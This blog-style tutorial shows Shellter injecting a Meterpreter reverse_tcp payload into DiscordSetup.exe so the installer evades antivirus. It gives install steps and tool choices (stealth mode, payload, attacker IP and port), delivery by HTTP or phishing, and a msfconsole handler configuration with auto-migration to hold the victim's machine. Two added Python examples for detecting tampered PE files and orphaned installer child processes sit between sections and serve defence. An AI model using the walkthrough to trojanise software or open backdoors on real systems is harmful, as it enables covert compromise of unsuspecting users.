Shellter - Hiding malicious code inside everyday installers

This tool will infect the PE with your malicious code by changing the execution flow of the target application with a unique dynamic approach.

by Johann Van Niekerk


Shellter is a great tool that allows dynamic shellcode/payload injection into a Portable Executable (PE). You can think of a PE as a standalone program that runs by itself, such as a program installer you have downloaded, like DiscordSetup.exe.

This tool will infect the PE with your malicious code by changing the execution flow of the target application with a unique dynamic approach. It does not, however, alter the original structure of the PE or make memory modifications that will be picked up by antivirus scanning. This is important, as it allows the infection of benign executables that are otherwise harmless, producing a file that carries malicious code yet can fool antivirus protections and go undetected. For all intents and purposes the executable is just a normal installer and doesn't set off any red flags, but what it does is definitely nefarious.

You may be questioning the relevance or impact of this method of obfuscation; I am here to show you the reach that this path of obfuscation has.

As mentioned, the intent is to use unique and complicated methods to infect something that appears harmless. This harmless file can be as simple as DiscordSetup.exe or winrar.exe. As you can imagine, this means that if there were some method to deliver this malicious file to an otherwise unsuspecting person, it would be possible to compromise that person's system without much difficulty.

Since the infection is unique and not something that is easily picked up by signature-based, and often heuristic-based, antivirus measures, this is a ticking time bomb until the person launches the application.

Please be aware that this is purely for research purposes in order to prevent it in the future.

With that being said, I will demonstrate the potential reach that this tool can have (and there are more similar and advanced methods and tools out there).

Setup & Installation

This is under the assumption that the reader is likely familiar with Linux and Offensive Security topics.

First up is the installation of the tool. It is available directly through the package manager in a few Linux distributions; it is also obtainable from the Shellter website, which includes download instructions. On Kali we run the following commands to install the tool as well as its dependency:

# Installation on Kali Linux
sudo apt install shellter

# Dependency
sudo apt install wine

In order to demonstrate and use the tool, you will need to get some type of installer to test against. For this example I have chosen to use the Discord application installer and I will demonstrate the infection and then the exploitation.

For this example I have downloaded the latest Discord installer and chosen the Windows binary from the Discord website.

Using Shellter

Shellter can be run directly from the terminal and will guide you with a few options.

# Run Shellter with the following terminal command

The tool allows a choice between Auto and Manual operation modes. Manual mode gives much more granular control over how the infection of the Portable Executable (installer) is done, with extensive customisation options; this is the process we would follow if the Auto method failed.

We will proceed with the Auto method for the time being:

The tool will then ask for the PE Target, the path to the executable. In this instance I will point the tool towards the executable we have downloaded (DiscordSetup.exe).

The application will automatically create a backup of the installer application and place it inside a backup folder.

Then the application will test the path behaviour and the instructions that the application executes. On Linux under Wine it may seem like the application is hanging, but it will test for 60 seconds before proceeding.

After some time it will ask a few questions about the behaviour of the application once it is exploited. In particular, Stealth Mode asks whether you want the binary to continue acting as it normally would after exploitation; in this case, whether the application should continue to install Discord as intended.

Next, it will ask what type of payload you wish to use: either a listed payload or, for flexibility, a custom payload.

For the demonstration we will stick with meterpreter for the time being.

This includes setting the IP address and specifying the port for the backdoor connection.

Finally, after entering the address and port, the application proceeds to infect the installer, and at the end we can see that the injection was successful.
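Shellter keeps a backup of the original installer before it writes the infected copy, which gives a defender a clean reference to diff against. The following is an added example, not part of the original post and not Shellter's own code: a small pure-stdlib PE header reader that compares the entry point and per-section hashes of two images. The two PE blobs it runs on are constructed in the script (a minimal single-section PE32, not a real installer); the file layout offsets follow the published PE format, and the helper name build_pe and the finding strings are my own.

```python
import hashlib
import struct

# Section-header Characteristics flags from the PE specification.
SCN_CNT_CODE = 0x00000020
SCN_MEM_EXECUTE = 0x20000000
SCN_MEM_READ = 0x40000000


def build_pe(entry_rva, text_bytes):
    """Constructed-sample helper (not a real installer): a minimal PE32 image
    with one executable .text section, just enough header for parse_pe()."""
    text_rva, text_raw, raw_size = 0x1000, 0x200, 0x200
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)      # e_lfanew -> 0x40
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 96, 0x0102)   # i386, 1 section
    # PE32 optional header: only Magic and AddressOfEntryPoint are populated.
    optional = struct.pack("<H", 0x10B) + b"\0" * 14 + struct.pack("<I", entry_rva)
    optional += b"\0" * (96 - len(optional))
    section = struct.pack("<8sIIIIIIHHI", b".text", len(text_bytes), text_rva,
                          raw_size, text_raw, 0, 0, 0, 0,
                          SCN_CNT_CODE | SCN_MEM_EXECUTE | SCN_MEM_READ)
    headers = dos + b"PE\0\0" + coff + optional + section
    headers += b"\0" * (text_raw - len(headers))
    return headers + text_bytes.ljust(raw_size, b"\0")


def parse_pe(data):
    """Read the entry point RVA and the section table of a PE32/PE32+ file and
    hash each section's raw bytes. Standard library only, no pefile."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ header")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    coff = pe_off + 4
    n_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # AddressOfEntryPoint sits at offset 16 of the optional header in both formats.
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    sections = []
    for i in range(n_sections):
        off = opt + opt_size + 40 * i
        (name, vsize, vaddr, rsize, rptr,
         _reloc, _lines, _nreloc, _nlines, chars) = struct.unpack_from("<8sIIIIIIHHI", data, off)
        raw = data[rptr:rptr + rsize]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "vaddr": vaddr,
            "vsize": max(vsize, rsize),
            "exec": bool(chars & SCN_MEM_EXECUTE),
            "sha256": hashlib.sha256(raw).hexdigest(),
        })
    return {"entry_point": entry, "sections": sections}


def compare_images(baseline, sample):
    """Return findings describing how `sample` differs from `baseline`: a moved
    entry point, changed or new sections, or an entry point that does not land
    in executable code. An empty list means the two files agree."""
    base, cur = parse_pe(baseline), parse_pe(sample)
    findings = []
    if base["entry_point"] != cur["entry_point"]:
        findings.append("entry point moved 0x%x -> 0x%x" % (base["entry_point"], cur["entry_point"]))
    known = {s["name"]: s for s in base["sections"]}
    for sec in cur["sections"]:
        ref = known.get(sec["name"])
        if ref is None:
            findings.append("new section %s" % sec["name"])
        elif ref["sha256"] != sec["sha256"]:
            findings.append("section %s contents changed" % sec["name"])
    ep = cur["entry_point"]
    if not any(s["exec"] and s["vaddr"] <= ep < s["vaddr"] + s["vsize"] for s in cur["sections"]):
        findings.append("entry point 0x%x is outside every executable section" % ep)
    return findings


# Constructed samples: a clean image whose .text is a single `ret` padded with
# int3, and a copy with the entry point moved and four bytes of .text altered.
CLEAN_TEXT = b"\xC3" + b"\xCC" * 63
BASELINE = build_pe(0x1000, CLEAN_TEXT)
MODIFIED = build_pe(0x1020, CLEAN_TEXT[:0x20] + b"\x90" * 4 + CLEAN_TEXT[0x24:])

if __name__ == "__main__":
    for finding in compare_images(BASELINE, MODIFIED):
        print(finding)
```

On a real case you would read the backup Shellter wrote and the infected output with open(path, "rb") and pass both to compare_images; any byte-level change in a section shows up as a hash mismatch even when the section table, sizes and imports are untouched, which is exactly the situation the post describes.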

With the injection successful, it is now a matter of getting the executable to the intended target. While this demonstration involves already having access to the machine, whether direct access or through an exploited remote shell, the principle still stands and demonstrates what would happen if phishing were successful. This could be in the form of an email carrying any Portable Executable; the technique doesn't restrict itself to installers.

The difference between this obfuscated payload and any traditionally generated backdoor executable is that this method mimics and behaves exactly how the application should. There are no differences in operation, and it thereby avoids any suspicion from the user. For all they know, Discord installed correctly.

In order to demonstrate, I used an HTTP server to transfer the file over.

Next we set up our listener on our Kali Linux machine to capture the connection that will come when the program is executed.

# Setup Meterpreter Listener
msfconsole -q
use exploit/multi/handler
set lhost
set lport 4444
set payload windows/meterpreter/reverse_tcp
set AutoRunScript post/windows/manage/migrate

msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Notice the following setting, which is not a usual part of a Meterpreter handler:

set AutoRunScript post/windows/manage/migrate

To provide clarity, this option will automatically spawn a new process immediately after the connection is established and then migrate to that process as quickly as possible. The reason is that the DiscordSetup.exe installer process will only be open or active until it has finished its job. If the installation is quick, your backdoor is very quickly taken away from you.

Using this additional option therefore means we are trying to escape from the installation process and move to a process that is more persistent. Normally penetration testers migrate manually to chosen processes to gain persistence and to avoid certain knock-on effects when processes close or stop. So this automatic method is crude, and if a person checks, they will see an instance of notepad active in the background.
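The migration behaviour just described leaves a telltale in process telemetry: an installer spawns a process that has nothing to do with installing (notepad in this case), and that process outlives the installer. The following is an added example, not part of the original post and not Metasploit or Shellter code: a detection pass over process create/exit events that reports any child of an installer still running when the installer exits, excluding expected hand-offs such as the installed application launching itself. The event records are constructed for this example in a Sysmon-like shape (not real telemetry), and the suffix list, allowlist and field names are my own assumptions.

```python
# Constructed process events (not real telemetry): an installer launches
# notepad.exe right after starting, launches the installed app at the end,
# then exits while notepad.exe is still running.
SAMPLE_EVENTS = [
    {"t": 0.0, "type": "create", "pid": 800, "ppid": 500,
     "image": "C:\\Users\\user\\Downloads\\DiscordSetup.exe"},
    {"t": 1.5, "type": "create", "pid": 1200, "ppid": 800,
     "image": "C:\\Windows\\System32\\notepad.exe"},
    {"t": 20.0, "type": "create", "pid": 1300, "ppid": 800,
     "image": "C:\\Users\\user\\AppData\\Local\\Discord\\Discord.exe"},
    {"t": 25.0, "type": "exit", "pid": 800},
]

# Assumed naming conventions: which images count as installers, and which
# children an installer is expected to hand off to when it finishes.
INSTALLER_SUFFIXES = ("setup.exe", "installer.exe")
EXPECTED_CHILDREN = ("discord.exe",)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def orphaned_installer_children(events, installer_suffixes=INSTALLER_SUFFIXES,
                                expected=EXPECTED_CHILDREN):
    """Return one alert per process that an installer spawned and that is still
    alive when the installer exits, unless the child is an expected hand-off."""
    created = {}    # pid -> create event
    children = {}   # parent pid -> [child pids]
    alive = set()
    alerts = []
    for ev in sorted(events, key=lambda e: e["t"]):
        if ev["type"] == "create":
            created[ev["pid"]] = ev
            alive.add(ev["pid"])
            children.setdefault(ev["ppid"], []).append(ev["pid"])
        elif ev["type"] == "exit":
            alive.discard(ev["pid"])
            parent = created.get(ev["pid"])
            if parent is None or not basename(parent["image"]).endswith(installer_suffixes):
                continue
            for cpid in children.get(ev["pid"], []):
                child = created[cpid]
                if cpid in alive and basename(child["image"]) not in expected:
                    alerts.append({
                        "parent": basename(parent["image"]),
                        "child": basename(child["image"]),
                        "child_pid": cpid,
                        "spawned_after_s": child["t"] - parent["t"],
                        "parent_exit_t": ev["t"],
                    })
    return alerts


if __name__ == "__main__":
    for alert in orphaned_installer_children(SAMPLE_EVENTS):
        print("%(parent)s exited at t=%(parent_exit_t)s leaving %(child)s "
              "(pid %(child_pid)s, spawned %(spawned_after_s)ss after start)" % alert)
```

The allowlist is what keeps this from firing on every installer that launches the program it just installed; in practice it would be populated per product, and the "spawned_after_s" field is useful for ranking, since a child created within seconds of the installer starting, long before any install work finished, is the more suspicious pattern.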

We run the listener and finally we begin the Discord installation.

Immediately we have obtained a callout connection from the victim and have established our backdoor.

From here, we can do anything we want and compromise the system completely.

Final Word

While the method and operation of the Shellter tool seem simple enough, it is worth remembering that Defender, Web Application Firewalls and antivirus vendors are aware of these tools, and their heuristic, machine-learned and adaptive detections can very easily pick up on most of these obfuscations and on software that has been altered in a malicious way.

As of writing this piece, both a completely updated Defender and Edge/Firefox picked up on the executable immediately, indicating that the Auto method is likely not the way to go. In this instance it may require the Manual method with some customisation that has not been picked up yet. This may not be true for older machines where updates are sparse and often forgotten.